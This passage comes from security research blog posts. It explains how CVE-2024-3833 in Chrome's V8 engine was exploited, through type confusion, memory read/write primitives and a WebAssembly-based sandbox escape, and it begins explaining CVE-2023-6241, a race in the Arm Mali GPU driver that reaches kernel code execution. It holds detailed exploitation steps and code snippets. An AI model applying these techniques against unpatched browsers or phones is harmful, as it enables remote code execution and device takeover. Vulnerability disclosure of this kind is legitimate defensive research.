  x.a7 = 0x100;
}
function transition_store2(x) {
  x.a8 = a8;
}
... //JIT optimize transition_store and transition_store2
transition_store(obj);
//Causes the object a8 to be interpreted as PropertyArray of obj
transition_store2(obj);

When storing the property a8 to the corrupted object obj that has inconsistent PropertyArray and unused_property_fields, an OOB write to the PropertyArray will overwrite PropertyArray of obj with the Javascript object a8. This can then be exploited by carefully arranging objects in the v8 heap. As the objects are allocated in the v8 heap linearly, the heap can easily be arranged by allocating objects in order. For example, in the following code:


var a8 = {c : 1};
var a7 = [1,2];

The v8 heap around the object a8 looks as follows:

The left hand side shows the objects a8 and a7. The fields map, properties, and elements are internal fields in the C++ objects that correspond to the Javascript objects. The right hand side represents the view of the memory as the PropertyArray of obj (when the PropertyArray of obj is set to the address of a8). A PropertyArray has two internal fields, map and length. When the object a8 is type-confused with a PropertyArray, its properties field, which is the address of its PropertyArray, is interpreted as the length of the PropertyArray of obj. As an address is usually a large number, this allows further OOB read and write to the PropertyArray of obj.

A property, ai+3 in the PropertyArray is going to align with the length field of the Array a7. By writing this property, the length of the Array a7 can be overwritten. This allows me to achieve an OOB write in a Javascript array, which can be exploited in a standard way. However, in order to overwrite the length field, I must keep adding properties to obj until I reach the length field. This, unfortunately, means that I will also overwrite the map, properties and elements fields, which will ruin the Array a7.

To avoid overwriting the internal fields of a7, I’ll instead create a7 so that its PropertyArray is allocated before it. This can be achieved by creating a7 with cloning:


var obj0 = {c0 : 0, c1 : 1, c2 : 2, c3 : 3};
obj0.c4 = {len : 1};
function clone0(x) {
  return {...x};
}
//run clone0(obj0) a few times to create inline cache handler
...
var a8 = {c : 1};
//inline cache handler used to create a7
var a7 = clone0(obj0);

The object obj0 has five fields, with the last one, c4 stored in the PropertyArray:


DebugPrint: 0xad0004a249: [JS_OBJECT_TYPE]
    ...
    0xad00198b45: [String] in OldSpace: #c4: 0x00ad0004a31d  (const data field 4), location: properties[0]

When cloning obj0 using the inline cache handler in the function clone0, recall that the PropertyArray of the target object (a7 in this case) is allocated first, and therefore the PropertyArray of a7 will be allocated right after the object a8, but before a7:


//address of a8
DebugPrint: 0xad0004a7fd: [JS_OBJECT_TYPE]
//DebugPrint of a7
DebugPrint: 0xad0004a83d: [JS_OBJECT_TYPE]
 - properties: 0x00ad0004a829 
 - All own properties (excluding elements): {
    ...
    0xad00198b45: [String] in OldSpace: #c4: 0x00ad0004a31d  (const data field 4), location: properties[0]
 }

As we can see, the address of a8 is 0xad0004a7fd, while the address of the PropertyArray of a7 is at 0x00ad0004a829, and a7 is at 0xad0004a83d. This leads to the following memory layout:

With this heap layout, I can overwrite the property c4 of a7 by writing to a property ai in obj that aligns to c4. Although map and length of the PropertyArray will also be overwritten, this does not seem to affect property access of a7. I can then create a type confusion between Javascript Object and Array by using optimized property loading in the JIT compiler.


function set_length(x) {
  x.c4.len = 1000;
}

When the function set_length is optimized with a7 as its input x, because the property c4 of a7 is an object that has a constant map (it is always {len : 1}), the map of this property is stored in the map of a7. The JIT compiler makes use of this information to optimize the property access of x.c4.len. As long as the map of x remains the same as the map of a7, x.c4 will have the same map as {len : 1} and therefore the property len of x.c4 can be accessed by using memory offset directly, without checking the map of x.c4. However, by using the OOB write in the PropertyArray to change a7.c4 into a double Array, corrupted_arr, the map of a7 will not change, and the JIT compiled code for set_length will treat a7.c4 as if it still has the same map as {len : 1}, and write directly to the memory offset corresponding to the len property of a7.c4. As a7.c4 is now an Array object, corrupted_arr, this will overwrite the length property of corrupted_arr, which allows me to access corrupted_arr out-of-bounds. Once an OOB access to corrupted_arr is achieved, gaining arbitrary read and write in the v8 heap is rather straightforward. It essentially consists of the following steps:

First, place an Object Array after corrupted_arr, and use the OOB read primitive in corrupted_arr to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.

Bypassing the v8 heap sandbox

The recently introduced v8 heap sandbox isolates the v8 heap from other process memory, such as executable code, and prevents memory corruptions within the v8 heap from accessing memory outside of the heap. To gain code execution, a way to escape the heap sandbox is needed. As the bug was reported soon after the Pwn2Own contest, I decided to check the commits to see if there was any sandbox escape that was patched as a result of the contest. Sure enough, there was a commit that appeared to be fixing a heap sandbox escape, which I assumed was used with an entry to the Pwn2Own contest.

When creating a WebAssembly.Instance object, objects from Javascript or other WebAssembly modules can be imported and be used in the instance:


const importObject = {
  imports: {
    imported_func(arg) {
      console.log(arg);
    },
  },
};
var mod = new WebAssembly.Module(wasmBuffer);
const instance = new WebAssembly.Instance(mod, importObject);

In this case, the imported_func is imported to the instance and can be called by WebAssembly functions defined in the WebAssembly module that imports them:


(module
  (func $i (import "imports" "imported_func") (param i32))
  (func (export "exported_func")
    i32.const 42
    call $i
  )

To implement this in v8, when the WebAssembly.Instance is created, a FixedAddressArray was used to store addresses of imported functions:


Handle WasmTrustedInstanceData::New(
    Isolate* isolate, Handle module_object) {
  ...
  const WasmModule* module = module_object->module();

  int num_imported_functions = module->num_imported_functions;
  Handle imported_function_targets =
      FixedAddressArray::New(isolate, num_imported_functions);
  ...

Which is then used as the call target when the imported function is called. As this FixedAddressArray lives in the v8 heap, it can easily be modified once I’ve gained arbitrary read and write primitives in the v8 heap. I can therefore rewrite the imported function targets, so that when an imported function is called in WebAssembly code, it’ll jump to the address of some shell code that I prepared to gain code execution.

In particular, if the imported function is a Javascript Math function, then some wrapper code is compiled and used as a call target in imported_function_targets:


bool InstanceBuilder::ProcessImportedFunction(
    Handle trusted_instance_data, int import_index,
    int func_index, Handle module_name, Handle import_name,
    Handle value, WellKnownImport preknown_import) {
    ...
    default: {
      ...
      WasmCode* wasm_code = native_module->import_wrapper_cache()->Get(   //kind() == WasmCode::kWasmToJsWrapper) {
        ...
      } else {
        // Wasm math intrinsics are compiled as regular Wasm functions.
        DCHECK(kind >= ImportCallKind::kFirstMathIntrinsic &&
               kind instance_object(),  //instruction_start());
      }

As the compiled wrapper code is stored in the same rx region where other WebAssembly code compiled by the Liftoff compiler is stored, I can create WebAssembly functions that store numerical data, and rewrite the imported_function_targets to jump to the middle of these data so that they get interpreted as code and be executed. The idea is similar to that of JIT spraying, which was a method to bypass the heap sandbox, but has since been patched. As the wrapper code and the WebAssembly code that I compiled are in the same region, the offsets between them can be computed, this allows me to jump precisely to the data in the WebAssembly code that I crafted to execute arbitrary shell code.

The exploit can be found here with some set-up notes.

Conclusion

In this post, I’ve looked at CVE-2024-3833, a bug that allows duplicate properties to be created in a v8 object, which is similar to the bug CVE-2021-30561. While the method to exploit duplicate properties in CVE-2021-30561 is no longer available due to code hardening, I was able to exploit the bug in a different way.

First transfer the duplicate properties into an inconsistency between an object’s PropertyArray and its map.
This then turns into an OOB write of the PropertyArray, which I then used to create a type confusion between a Javascript Object and a Javascript Array.
Once such type confusion is achieved, I can rewrite the length of the type confused Javascript Array. This then becomes an OOB access in a Javascript Array.

Once an OOB access in an Javascript Array (corrupted_arr) is achieved, it is fairly standard to turn this into an arbitrary read and write inside the v8 heap. It essentially consists of the following steps:

First, place an Object Array after corrupted_arr, and use the OOB read primitive in corrupted_arr to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.

As v8 has recently implemented the v8 heap sandbox, getting arbitrary memory read and write in the v8 heap is not sufficient to achieve code execution. In order to achieve code execution, I overwrite jump targets of WebAssembly imported functions, which were stored in the v8 heap. By rewriting the jump targets to locations of shell code, I can execute arbitrary code calling imported functions in a WebAssembly module.

The post Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties appeared first on The GitHub Blog.

Gaining kernel code execution on an MTE-enabled Pixel 8

Man Yue Mo — Mon, 18 Mar 2024 15:00:55 +0000

In this post, I’ll look at CVE-2023-6241, a vulnerability in the Arm Mali GPU that I reported to Arm on November 15, 2023 and was fixed in the Arm Mali driver version r47p0, which was released publicly on December 14, 2023. It was fixed in Android in the March security update. When exploited, this vulnerability allows a malicious Android app to gain arbitrary kernel code execution and root on the device. The vulnerability affects devices with newer Arm Mali GPUs that use the Command Stream Frontend (CSF) feature, such as Google’s Pixel 7 and Pixel 8 phones. What is interesting about this vulnerability is that it is a logic bug in the memory management unit of the Arm Mali GPU and it is capable of bypassing Memory Tagging Extension (MTE), a new and powerful mitigation against memory corruption that was first supported in Pixel 8. In this post, I’ll show how to use this bug to gain arbitrary kernel code execution in the Pixel 8 from an untrusted user application. I have confirmed that the exploit works successfully even with kernel MTE enabled by following these instructions.

Arm64 MTE

MTE is a very well documented feature on newer Arm processors that uses hardware implementations to check for memory corruption. As there are already many good articles about MTE, I’ll only briefly go through the idea of MTE and explain its significance in comparison to other mitigations for memory corruption. Readers who are interested in more details can, for example, consult this article and the whitepaper released by Arm.

While the Arm64 architecture uses 64 bit pointers to access memory, there is usually no need to use such a large address space. In practice, most applications use a much smaller address space (usually 52 bits or less). This leaves the highest bits in a pointer unused. The main idea of memory tagging is to use these higher bits in an address to store a “tag” that can then be used to check against the other tag stored in the memory block associated with the address. The helps to mitigate common types of memory corruptions as follows:

In the case of a linear overflow, a pointer is used to dereference an adjacent memory block that has a different tag compared to the one stored in the pointer. By checking these tags at dereference time, the corrupted dereference can be detected. For use-after-free type memory corruptions, as long as the tag in a memory block is cleared every time it is freed and a new tag reassigned when it is allocated, dereferencing an already freed and reclaimed object will also lead to a discrepancy between pointer tag and the tag in memory, which allows use-after-free to be detected.

(The above image is from Memory Tagging Extension: Enhancing memory safety through architecture published by Arm.)

The main reason that memory tagging is different from previous mitigations, such as Kernel Control Flow Integrity (kCFI) is that, unlike other mitigations, which disrupts later stages of an exploit, MTE is a very early stage mitigation that tries to catch memory corruption when it first happens. As such, it is able to stop an exploit in a very early stage before the attacker has gained any capabilities and it is therefore very difficult to bypass. It introduces checks that effectively turns an unsafe memory language into one that is memory safe, albeit probabilistically.

In theory, memory tagging can be implemented in software alone, by making the memory allocator assign and remove tags everytime memory is allocated or free, and by adding tag checking logic when dereferencing pointers. Doing so, however, incurs a performance cost that makes it unsuitable for production use. As a result, hardware implementation is needed to reduce the performance cost and to make memory tagging viable for production use. The hardware support was introduced in the v8.5a version of the ARM architecture, in which extra hardware instructions (called MTE) were introduced to perform tagging and checking. For Android devices, most chipsets that support MTE use Arm v9 processors (instead of Arm v8.5a), and currently there are only a handful of devices that support MTE.

One of the limitations of MTE is that the number of available unused bits is small compared to all possible memory blocks that can ever be allocated. As such, tag collision is inevitable and many memory blocks will have the same tag. This means that a corrupted memory access may still succeed by chance. In practice, even when using only 4 bits for the tag, the success rate is reduced to 1/16, which is still a fairly strong protection against memory corruption. Another limitation is that, by leaking pointer and memory block values using side channel attack such as Spectre, an attacker may be able to ensure that a corrupted memory access is done with the correct tag and thus bypasses MTE. This type of leak, however, is mostly only available to a local attacker. The series of articles, MTE As Implemented by Mark Brand, includes an in-depth study of the limitations and impact of MTE on various attack scenarios.

Apart from having hardware that uses processors that implements Arm v8.5a or above, software support is also required to enable MTE. Currently, only Google’s Pixel 8 allows users to enable MTE in the developer options and MTE is disabled by default. Extra steps are also required to enable MTE in the kernel.

The Arm Mali GPU

The Arm Mali GPU can be integrated in various devices, (for example, see “Implementations” in Mali (GPU) Wikipedia entry). It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times. The current vulnerability is closely related to another issue that I reported and is a vulnerability in the handling of a type of GPU memory called JIT memory. I’ll now briefly explain JIT memory and explain the vulnerability CVE-2023-6241.

JIT memory in Arm Mali

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.

In particular, the kbase_context manages different types of memory that are shared between the GPU device and user space applications. User applications can either map their own memory to the memory space of the GPU so the GPU can access this memory, or they can allocate memory from the GPU. Memory allocated by the GPU is managed by the kbase_context and can be mapped to the GPU memory space and also mapped to user space. A user application can also use the GPU to access mapped memory by submitting commands to the GPU. In general, memory needs to be either allocated and managed by the GPU (native memory) or imported to the GPU from user space, and then mapped to the GPU address space before it can be accessed by the GPU. A memory region in the Mali GPU is represented by the kbase_va_region. Similar to virtual memory in the CPU, a memory region in the GPU may not have its entire range backed by physical memory. The nr_pages field in a kbase_va_region specifies the virtual size of the memory region, whereas gpu_alloc->nents is the actual number of physical pages that are backing the region. I’ll refer to these pages as the backing pages of the region from now on. While the virtual size of a memory region is fixed, its physical size can change. From now on, when I use terminologies such as resize, grow and shrink regarding a memory region, what I mean is that the physical size of the region is resizing, growing or shrinking.

The JIT memory is a type of native memory whose lifetime is managed by the kernel driver. User applications request the GPU to allocate and free JIT memory by sending relevant commands to the GPU. While most commands, such as those using GPU to perform arithmetic and memory accesses are executed on the GPU itself, there are some commands, such as the ones used for managing JIT memory, that are implemented in the kernel and executed on the CPU. These are called software commands (in contrast to hardware commands that are executed on the GPU (hardware)). On GPUs that use the Command Stream Frontend (CSF), software commands and hardware commands are placed on different types of command queues. To submit a software command, a kbase_kcpu_command_queue is needed and it can be created by using the KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl. A software command can then be queued using the KBASE_IOCTL_KCPU_QUEUE_ENQUEUE command. To allocate or free JIT memory, commands of type BASE_KCPU_COMMAND_TYPE_JIT_ALLOC and BASE_KCPU_COMMAND_TYPE_JIT_FREE can be used.

The BASE_KCPU_COMMAND_TYPE_JIT_ALLOC command uses kbase_jit_allocate to allocate JIT memory. Similarly, the command BASE_KCPU_COMMAND_TYPE_JIT_FREE can be used to free JIT memory. As explained in the section “The life cycle of JIT memory” in one of my previous posts, when JIT memory is freed, it goes into a memory pool managed by the kbase_context and when kbase_jit_allocate is called, it first looks into this memory pool to see if there is any suitable freed JIT memory that can be reused:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
  ...
  kbase_gpu_vm_lock(kctx);
  mutex_lock(&kctx->jit_evict_lock);
  /*
   * Scan the pool for an existing allocation which meets our
   * requirements and remove it.
   */
  if (info->usage_id != 0)
    /* First scan for an allocation with the same usage ID */
    reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
  ...
}

If an existing region is found and its virtual size matches the request, but its physical size is too small, then kbase_jit_allocate will attempt to allocate more physical pages to back the region by calling kbase_jit_grow:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
    /* kbase_jit_grow() can release & reacquire 'kctx->reg_lock',
     * so any state protected by that lock might need to be
     * re-evaluated if more code is added here in future.
     */
    ret = kbase_jit_grow(kctx, info, reg, prealloc_sas,
             mmu_sync_info);
   ...
}

If, on the other hand, no suitable region is found, kbase_jit_allocate will allocate JIT memory from scratch:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
  } else {
    /* No suitable JIT allocation was found so create a new one */
    u64 flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD |
        BASE_MEM_PROT_GPU_WR | BASE_MEM_GROW_ON_GPF |
        BASE_MEM_COHERENT_LOCAL |
        BASEP_MEM_NO_USER_FREE;
    u64 gpu_addr;
        ...
    mutex_unlock(&kctx->jit_evict_lock);
    kbase_gpu_vm_unlock(kctx);
    reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
              &flags, &gpu_addr, mmu_sync_info);
   ...
}

As we can see from the comment above the call to kbase_jit_grow, kbase_jit_grow can temporarily drop the kctx->reg_lock:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))
    goto update_failed;
    ...
  old_size = reg->gpu_alloc->nents;                      //commit_pages - reg->gpu_alloc->nents;    //<---------2.
  pages_required = delta;
    ...
  while (kbase_mem_pool_size(pool) mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);                        //<---------- lock dropped.
    ret = kbase_mem_pool_grow(pool, pool_delta);
    kbase_gpu_vm_lock(kctx);
        ...
}

In the above, we see that kbase_gpu_vm_unlock is called to temporarily drop the kctx->reg_lock, while kctx->mem_partials_lock is also dropped during a call to kbase_mem_pool_grow. In the Mali GPU, the kctx->reg_lock is used for protecting concurrent accesses to memory regions. So, for example, when kctx->reg_lock is held, the physical size of the memory region cannot be changed by another thread. In GHSL-2023-005 that I reported previously, I was able to trigger a race so that the JIT region was shrunk by using the KBASE_IOCTL_MEM_COMMIT ioctl from another thread while kbase_mem_pool_grow was running. This change in the size of the JIT region caused reg->gpu_alloc->nents to change after kbase_mem_pool_grow, meaning that the actual value of reg->gpu_alloc->nents was then different from the value that was cached in old_size and delta (1. and 2. in the above). As these values were later used to allocate and map the JIT region, using these stale values caused inconsistency in the GPU memory mapping, causing GHSL-2023-005.


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
   //grow memory pool
    ...
    //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);
    ...
}

After GHSL-2023-005 was patched, it was no longer possible to change the size of JIT memory using the KBASE_IOCTL_MEM_COMMIT ioctl.

The vulnerability

Similar to virtual memory, when an address in a memory region that is not backed by a physical page is accessed by the GPU, a memory access fault happens. In this case, depending on the type of the memory region, it may be possible to allocate and map a physical page on the fly to back the fault address. A GPU memory access fault is handled by the kbase_mmu_page_fault_worker:


void kbase_mmu_page_fault_worker(struct work_struct *data)
{
    ...
    kbase_gpu_vm_lock(kctx);
    ...
  if ((region->flags & GROWABLE_FLAGS_REQUIRED)
      != GROWABLE_FLAGS_REQUIRED) {
    kbase_gpu_vm_unlock(kctx);
    kbase_mmu_report_fault_and_kill(kctx, faulting_as,
        "Memory is not growable", fault);
    goto fault_done;
  }

  if ((region->flags & KBASE_REG_DONT_NEED)) {
    kbase_gpu_vm_unlock(kctx);
    kbase_mmu_report_fault_and_kill(kctx, faulting_as,
        "Don't need memory can't be grown", fault);
    goto fault_done;
  }

    ...
  spin_lock(&kctx->mem_partials_lock);
  grown = page_fault_try_alloc(kctx, region, new_pages, &pages_to_grow,
      &grow_2mb_pool, prealloc_sas);
  spin_unlock(&kctx->mem_partials_lock);
    ...
}

Within the fault handler, a number of checks are performed to ensure that the memory region is allowed to grow in size. The two checks that are relevant to JIT memory are the checks for the GROWABLE_FLAGS_REQUIRED and the KBASE_REG_DONT_NEED flags. The GROWABLE_FLAGS_REQUIRED is defined as follows:

#define GROWABLE_FLAGS_REQUIRED (KBASE_REG_PF_GROW | KBASE_REG_GPU_WR)

These flags are added to a JIT region when it is created by kbase_jit_allocate and are never changed:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
  } else {
    /* No suitable JIT allocation was found so create a new one */
    u64 flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD |
        BASE_MEM_PROT_GPU_WR | BASE_MEM_GROW_ON_GPF |      //jit_evict_lock);
    kbase_gpu_vm_unlock(kctx);
    reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
              &flags, &gpu_addr, mmu_sync_info);
   ...
}

While the KBASE_REG_DONT_NEED flag is added to a JIT region when it is freed, it is removed in kbase_jit_grow well before the kctx->reg_lock and kctx->mem_partials_lock are dropped and kbase_mem_pool_grow is called:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
  ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))    //<----- Remove KBASE_REG_DONT_NEED
  goto update_failed;
    ...
  while (kbase_mem_pool_size(pool) mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);
    ret = kbase_mem_pool_grow(pool, pool_delta);      //<----- race window: fault handler grows region
    kbase_gpu_vm_lock(kctx);
        ...
}

In particular, during the race window marked in the above snippet, the JIT memory reg is allowed to grow when a page fault happens.

So, by accessing unmapped memory in the region to create a fault on another thread while kbase_mem_pool_grow is running, I can cause the JIT region to be grown by the GPU fault handler while kbase_mem_pool_grow runs. This then changes reg->gpu_alloc->nents and invalidates old_size and delta in 1. and 2. below:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))
    goto update_failed;
    ...
  old_size = reg->gpu_alloc->nents;                      //commit_pages - reg->gpu_alloc->nents;    //<---------2.
  pages_required = delta;
    ...
  while (kbase_mem_pool_size(pool) mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);
    ret = kbase_mem_pool_grow(pool, pool_delta);  //gpu_alloc->nents changed by fault handler
    kbase_gpu_vm_lock(kctx);
        ...
   //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,   //commit_pages,         //<----- 4.
            old_size);
    ...
}

As a result, when delta and old_size are used in 3. and 4. to allocate backing pages and to map the pages to the GPU memory space, their values are invalid.

This is very similar to what happened with GHSL-2023-005. As kbase_mem_pool_grow involves large memory allocations, this race can be won very easily. There is, however, one very big difference here: With GHSL-2023-005, I was able to shrink the JIT region while in this case, I was only able to grow the JIT region. To understand why this matters, let’s have a brief recap of how my exploit for GHSL-2023-005 worked.

As mentioned before, the physical size, or the number of backing pages of a kbase_va_region is stored in the field reg->gpu_alloc->nents. A kbase_va_region has two kbase_mem_phy_alloc objects: the cpu_alloc and gpu_alloc that are responsible for managing its backing pages. For Android devices, these two fields are configured to be the same. Within kbase_mem_phy_alloc, the field pages is an array that contains the physical addresses of the backing pages, while nents specifies the length of the pages array:


struct kbase_mem_phy_alloc {
    ...
  size_t                nents;
  struct tagged_addr    *pages;
    ...
}

When kbase_alloc_phy_pages_helper_locked is called, it allocates memory pages and appends the physical addresses represented by these pages to the array pages, so the new pages are added to the index nents onwards. The new size is then stored to nents. For example, when it is called in kbase_jit_grow, delta is the number of pages to add:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
   //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
}

In this case, delta pages are inserted at the index nents in the array pages of gpu_alloc:

After the backing pages are allocated and inserted into the pages array, the new pages are mapped to the GPU address space by calling kbase_mem_grow_gpu_mapping. The virtual address of a kbase_va_region in the GPU memory space is managed by the kbase_va_region itself and is stored in the fields start_pfn and nr_pages:


struct kbase_va_region {
    ...
  u64 start_pfn;
    ...
  size_t nr_pages;
    ...
}

The start of the virtual address of a kbase_va_region is stored in start_pfn (as a page frame, so the actual address is start_pfn >> PAGE_SIZE) while nr_pages stores the size of the region. These fields remain unchanged after they are set. Within a kbase_va_region, the initial reg->gpu_alloc->nents pages in the virtual address space are backed by the physical memory stored in the pages array of gpu_alloc->pages, while the rest of the addresses are not backed. In particular, the virtual addresses that are backed are always contiguous (so, no gaps between backed regions) and always start from the start of the region. For example, the following is possible:

While the following case is not allowed because the backing does not start from the beginning of the region:

and this following case is also not allowed because of the gaps in the addresses that are backed:

In the case when kbase_mem_grow_gpu_mapping is called in kbase_jit_grow, the GPU addresses between (start_pfn + old_size) * 0x1000 to (start_pfn + info->commit_pages) * 0x1000 are mapped to the newly added pages in gpu_alloc->pages, which are the pages between indices pages + old_size and pages + info->commit_pages (because delta = info->commit_pages - old_size):


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    old_size = reg->gpu_alloc->nents;
    delta = info->commit_pages - reg->gpu_alloc->nents;
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);
    ...
}

In particular, old_size here is used to specify both the GPU address where the new mapping should start, and also the offset from the pages array where backing pages should be used.

If reg->gpu_alloc->nents changes after old_size and delta are cached, then these offsets may become invalid. For example, if the kbase_va_region was shrunk and nents decreased after old_size and delta were stored, then kbase_alloc_phy_pages_helper_locked will insert delta pages to reg->gpu_alloc->pages + nents:

Similarly, kbase_mem_grow_gpu_mapping will map the GPU addresses starting from (start_pfn + old_size) * 0x1000, using the pages that are between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + nents + delta (dotted lines in the figure below). This means that the pages between pages->nents and pages->old_size don’t end up getting mapped to any GPU addresses, while some addresses end up having no backing pages:

Exploiting GHSL-2023-005

GHSL-2023-005 enabled me to shrink the JIT region but CVE-2023-6241 does not give me that capability. To understand how to exploit this issue, we need to know a bit more about how GPU mappings are removed. The function kbase_mmu_teardown_pgd_pages is responsible for removing address mappings from the GPU. This function essentially walks through a GPU address range and removes the addresses from the GPU page table by marking them as invalid. If it encounters a high level page table entry (PTE), which covers a large range of addresses, and finds that the entry is invalid, then it’ll skip removing the entire range of addresses covered by the entry. For example, a level 2 page table entry covers a range of 512 pages, so if a level 2 page table entry is found to be invalid (1. in the below), then kbase_mmu_teardown_pgd_pages will assume the next 512 pages are covered by this level 2 and hence are all invalid already. As such, it’ll skip removing these pages (2. in the below).


static int kbase_mmu_teardown_pgd_pages(struct kbase_device *kbdev, struct kbase_mmu_table *mmut,
          u64 vpfn, size_t nr, u64 *dirty_pgds,
          struct list_head *free_pgds_list,
          enum kbase_mmu_op_type flush_op)
{
        ...
        for (level = MIDGARD_MMU_TOPLEVEL;
                level ate_is_valid(page[index], level))
                break; /* keep the mapping */
            else if (!mmu_mode->pte_is_valid(page[index], level)) {  //<------ 1.
                /* nothing here, advance */
                switch (level) {
                ...
                case MIDGARD_MMU_LEVEL(2):
                    count = 512;            // nr)
                    count = nr;
                goto next;
            }
        ...
next:
        kunmap(phys_to_page(pgd));
        vpfn += count;
        nr -= count;

The function kbase_mmu_teardown_pgd_pages is called either when a kbase_va_region is shrunk or when it is deleted. As explained in the previous section, the virtual addresses in a kbase_va_region that are mapped and backed by physical pages must be contiguous from the start of the kbase_va_region. As a result, if any address in the region is mapped, then the start address must be mapped and hence the high level page table entry covering the start address must be valid (if no address in the region is mapped, then kbase_mmu_teardown_pgd_pages would not even be called):

In the above, the level 2 PTE that covers the start address of the region is mapped and so it is valid, therefore in this case, if kbase_mmu_teardown_pgd_pages ever encounters an unmapped high level PTE, the rest of the addresses in the kbase_va_region must have already been unmapped and can be skipped safely.

In the case where a region is shrunk, the address where the unmapping starts lies within the kbase_va_region, and the entire range between this start address and the end of the region will be unmapped. If the level 2 page table entry covering this address is invalid, then the start address must be in a region that is not mapped, and hence the rest of the address range to unmap must also not have been mapped. In this case, skipping of addresses is again safe:

So, as long as regions are only mapped from their start addresses and have no gaps in the mappings, kbase_mmu_teardown_pgd_pages will behave correctly.

In the case of GHSL-2023-005, it is possible to create a region that does not meet these conditions. For example, by shrinking the entire region to size zero during the race window, it is possible to create a region where the start of the region is unmapped:

When the region is deleted, and kbase_mmu_teardown_pgd_pages tries to remove the first address, because the level 2 PTE is invalid, it’ll skip the next 512 pages, some of which may actually have been mapped:

In this case, addresses in the “incorrectly skipped” region will remain mapped to some entries in the pages array in the gpu_alloc, which are already freed. And these “incorrectly skipped” GPU addresses can be used to access already freed memory pages.

Exploiting CVE-2023-6241

The situation, however, is very different when a region is grown during the race window. In this case, nents is larger than old_size when kbase_alloc_phy_pages_helper_locked and kbase_mem_grow_gpu_mapping are called, and delta pages are being inserted at index nents of the pages array:

The pages array contains the correct number of pages to backup both the jit grow and the fault access, and is in fact exactly how it should be when kbase_jit_grow is called after the page fault handler.

When kbase_mem_grow_gpu_mapping is called, delta pages are mapped to the GPU from (start_pfn + old_size) * 0x1000. As the total number of backing pages has now increased by fh + delta, where fh is the number of pages added by the fault handler, this leaves the last fh pages in the pages array unmapped.

This, however, does not seem to create any problem either. The memory region still only has its start addresses mapped and there is no gap in the mapping. The pages that are not mapped are simply not accessible from the GPU and will get freed when the memory region is deleted, so it isn’t even a memory leak issue.

However, not all is lost. As we have seen, when a GPU page fault happens, if the cause of the fault is that the address is not mapped, then the fault handler will try to add backing pages to the region and map these new pages to the extent of the region. If the fault address is, say fault_addr, then the minimum number of pages to add is new_pages = fault_addr/0x1000 - reg->gpu_alloc->nents. Depending on the kbase_va_region, some padding may also be added. In any case, these new pages will be mapped to the GPU, starting from the address (start_pfn + reg->gpu_alloc->nents) * 0x1000, so as to preserve the fact that only the addresses at the start of a region are mapped.

This means that, if I trigger another GPU fault in the JIT region that was affected by the bug, then some new mappings will be added after the region that is not mapped.

This creates a gap in the GPU mappings, and I’m starting to get something that looks exploitable.

